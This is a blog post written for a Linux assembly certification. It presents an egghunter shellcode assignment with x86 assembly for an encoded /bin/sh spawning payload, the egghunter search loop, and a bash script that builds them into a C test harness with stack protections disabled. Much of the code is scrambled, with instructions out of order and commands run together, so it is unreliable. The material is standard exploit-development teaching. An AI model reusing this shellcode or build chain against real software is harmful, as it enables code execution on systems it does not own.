Sunday, January 4, 2015

3. Egghunter shellcode

The exam at Securitytube Linux Assembly Expert course consists of creating or analyzing shellcodes. This is the third assignment, where I have to create an egghunter shellcode, where the pattern is configurable.

Usually during an exploit, there is not enough space for the shellcode. In order to solve this problem, one can split the shellcode into two parts. The first part includes the shellcode to be executed (which can't fit the space in the exploit), and the second part is the shellcode which can fit into the exploit, and start the original shellcode. But in order to start the shellcode, it has to be located in memory. The trick is that the shellcode to be executed starts with a magic string, duplicated, and the other shellcode searches for this string, twice. It has to be duplicated because otherwise the finder script could find itself.

Let's start with the /bin/sh shellcode

global _start
db "eGGheGGh" ;declare egghunter keyword
section .text _start:
; Pushing //bin/sh
xor eax, eax push eax
add esi, 0x22222222 ;push 0x68732f2f ;"sh//"
mov esi, 0x46510d0d ;decode /bin/sh mov dword [esp-4], esi
add esi, 0x22222112 ;push 0x6e69622f ;"nib/"
mov esi, 0x4c47411d ;decode /bin/sh mov dword [esp-8], esi sub esp, 8 ;align esp
int 0x80
mov ebx, esp push eax mov edx, esp push ebx mov ecx, esp
mov al, 11

And the so called egg-hunter shellcode:
global _start
section .text
pop eax
_start: _next:
inc eax _isegg:
cmp dword [eax-0x8],0x68474765 ;start egg
jne _next cmp dword [eax-0x4],0x68474765 ;end egg
jmp eax ;execute our (not so tiny) shellcode
jne _next

And finally, the script to configure, build and run the shellcodes:
echo 'Usage ./ source_file pattern E.g. ./ eggh shellcode patt where eggh.nasm is the source file'
patt=`echo -n $3| xxd -p|sed -r s/\([0-9a-f]{2}\)\([0-9a-f]{2}\)\([0-9a-f]{2}\)\([0-9a-f]{2}\)/\\\4\\\3\\\2\\\1/`
cp $1.nasm_ $1.nasm
echo pattern in reverse hex: $patt cp $1.nasm $1.nasm_orig sed s/0x68474765/0x$patt/g < $1.nasm > $1.nasm_ echo '[+] Assembling with Nasm ... '
for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode1.asm; done
nasm -f elf32 -o $1.o $1.nasm echo '[+] Linking ...' ld -melf_i386 -o $1 $1.o echo '[+] Dumping shellcode ...' echo '' > shellcode.asm cp $2.nasm $2.nasm_orig
echo '[+] Dumping shellcode ...'
sed s/eGGh/$patt/g < $2.nasm > $2.nasm_ echo '[+] Assembling with Nasm ... ' nasm -f elf32 -o $2.o $2.nasm echo '[+] Linking ...' ld -melf_i386 -o $2 $2.o echo '' > shellcode.asm
for i in `objdump -d $2 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode2.asm; done echo '[+] Creating new shellcode.c ...' cat > shellcode.c <<EOF #include<string.h> unsigned char egg_hunter[] ="\\ EOF #echo -n "\\" >> shellcode.c
printf("Length of shellcode is %d\n",strlen(code));
cat shellcode1.asm >> shellcode.c cat >> shellcode.c <<EOF "; unsigned char code[] ="\\ EOF #echo -n "\\" >> shellcode.c cat shellcode2.asm >> shellcode.c cat >> shellcode.c <<EOF "; main() { printf("Length of egg_hunter is %d\n",strlen(egg_hunter)); (*(void (*)()) egg_hunter)(); return 0; } EOF
echo '[+] Done! Run ./shellcode to execute!'
echo '[+] Compiling shellcode.c ...' gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c

Let's test this!

Happy shell! :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Student-ID: SLAE - 607

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